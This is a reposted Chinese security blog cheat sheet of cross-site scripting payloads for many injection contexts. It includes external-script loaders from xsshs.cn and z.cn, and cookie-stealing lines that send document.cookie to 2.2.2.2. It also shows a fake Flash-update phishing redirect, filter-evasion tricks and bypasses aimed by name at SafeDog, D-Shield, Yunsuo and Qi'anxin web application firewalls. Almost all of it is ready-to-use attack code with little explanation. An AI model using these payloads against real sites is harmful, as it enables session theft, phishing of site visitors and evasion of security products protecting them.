不一样的xss payload
2022-8-28 08:11:26 Author: 系统安全运维(查看原文) 阅读量:56 收藏

不同的情况不一样的xss payload:

弹窗

<script>alert(1)</script><script>prompt(2)</script><script>confirm(3)</script><script>console.log(3)</script><script>document.write(1)</script>

当不能弹窗的时候,可以用下面的payload来证明

<script>console.log(3)</script><script>document.write(1)</script>

引入外部js,可能需要短域名

<script src=//xsshs.cn></script><img src onerror=appendChild(createElement("script")).src="//xsshs.cn/aaaa"><img src onerror=jQuery.getScript("//xsshs.cn/aaaa")>

盗取cookie

<script>window.location.href="http://2.2.2.2/?msg="+escape(document.cookie)</script><script>document.body.appendChild(document.createElement("img")).src="http://2.2.2.2/?msg="+escape(document.cookie)</script>

结合弹窗和url跳转进行钓鱼

<script>alert("您的flash版本过低,请更新您的flash版本"); window.location.href ="https://www.flash.cn/cdm/latest/flashplayer_install_cn.exe"</script>

当xss的触发位置在标签外

name=<script>alert(1)</script>

标签内

name="><script>alert(1)</script>name=1" id=javascript:alert(1) autofocus onfocus=location=this.id xx="

在href=中

name=javascript:alert(1)

在js中

name=</script><script>alert(1)</script>name=';alert(1)//name='-alert(1)-'name=';};alert(1);function a(){a='

在xml中

<?xml version="1.0"?><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'></a><?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(1);</html:script></html:html>

svg

<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="100px" height="100px" viewBox="0 0 751 751" enable-background="new 0 0 751 751" xml:space="preserve">  <image id="image0" width="751" height="751" x="0" y="0"    href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAu8AAALvCAIAAABa4bwGAAAAIGNIUk0AAHomAACAhAAA+gAAAIDo" /><script>alert(1)</script></svg>

当过滤了圆括号

<script>alert`1`</script><video src onerror=a="%2",location="javascript:aler"+"t"+a+"81"+a+"9"><video src onerror="javascript:window.onerror=alert;throw 1">

当过滤了空格

假设payload如下: 

html><imgAAsrcAAonerrorBB=BBalertCC(1)DD</html>

A位置可填充/,/123/,%09,%0A,%0C,%0D,%20 

B位置可填充%09,%0A,%0C,%0D,%20 

C位置可填充%0B,如果加双引号,则可以填充/**/,%09,%0A ,%0C,%0D,%20 

D位置可填充%09,%0A,%0C,%0D,%20,//,>

函数配合拼接

<video/src/onerror=top.alert(1);><video/src/onerror=top[`al`+`ert`](1);><video/src/onerror=self[`al`+`ert`](1);><video/src/onerror=parent[`al`+`ert`](1);><video/src/onerror=window[`al`+`ert`](1);><video/src/onerror=frames[`al`+`ert`](1);><video/src/onerror=content[`al`+`ert`](1);><body/onload=eval(alert(1));><body/onload=eval(`al`+`ert(1)`);><body/onload=open(alert(1));><body/onload=document.write(alert(1));><body/onload=setTimeout(alert(1));><body/onload=setInterval(alert(1));><body/onload=Set.constructor(alert(1))()><body/onload=Map.constructor(alert(1))()><body/onload=Array.constructor(alert(1))()><body/onload=WeakSet.constructor(alert(1))()><body/onload=constructor.constructor(alert(1))><video/src/onerror=[1].map(alert);><video/src/onerror=[1].map(eval('al'+'ert'));><video/src/onerror=[1].find(alert);><video/src/onerror=[1].every(alert);><video/src/onerror=[1].filter(alert);><video/src/onerror=[1].forEach(alert);><video/src/onerror=[1].findIndex(alert);>

赋值和拼接

<img src onerror=_=alert,_(1)><img src alt=al lang=ert onerror=top[alt+lang](1)><img src onerror=top[a='al',b='ev',b+a]('alert(1)')><img src onerror=['ale'+'rt'].map(top['ev'+'al'])[0]['valu'+'eOf']()(1)>

创建匿名函数

<video/src/onerror=Function('ale'+'rt(1)')();>

伪协议

<svg/onload=javascript:alert(1)><iframe src=javascript:alert(1)><form action=javascript:alert(1)><input type=submit><a href=javascript:alert(123);>xss</a><iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=><object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=></object><embed src=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">

安全狗

http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=top[`al`%2B`ert`](1);>http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=appendChild(createElement("script")).src="//z.cn">

D盾

http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[`al`%2B`ert`](1);>http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>

云锁+奇安信waf

http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[`al`%2B`ert`](1);>http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>

一些新奇的xss playload

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"><BODY BACKGROUND="javascript:alert('XSS')"><input onfocus=alert(1) autofocus><h1 onmousemove="alert(1)">title</h1><select onfocus=alert(1) autofocus><iframe src="vbscript:msgbox(1)"></iframe> <iframe src="javascript:alert(1)"></iframe><iframe src="vbscript:msgbox(1)"></iframe><iframe onload=alert(1)></iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe> <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> </iframe><iframe src="vbscript:msgbox(1)"></iframe></iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe><details open ontoggle=prompt(/xss/)><plaintext/onmouseover=prompt(1)>javascript://comment%250aalert(1) <img src=x onerror=confirm(1)><video><source onerror=alert(1)><audio src=x onerror="alert(1)"><body onload=alert(1)><body onscroll=alert(1);><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus><textarea onfocus=alert(1) autofocus>
版权声明:本文为CSDN博主「Redmaple925」的原创文章。原文链接:https://blog.csdn.net/songbai220/article/details/120667388

好文推荐

信息收集常用的工具

几款实用的内网穿透工具

实战挖掘一个某公司网站漏洞

渗透测试报告自动生成工具 -- Savior

Spring 框架相关漏洞合集 | 红队技术

一款漏洞查找器(挖漏洞的有力工具)

神兵利器 | 分享 直接上手就用的内存马(附下载)

推荐一款自动向hackerone发送漏洞报告的扫描器

欢迎关注 系统安全运维


文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247508871&idx=2&sn=7bc3b44dd370be5e0e44b865d9adc4ec&chksm=c30870f7f47ff9e1ef7d9fd4fada7b344e9db5ad5850d039a166b2504674077bf041a462b74d#rd
如有侵权请联系:admin#unsafe.sh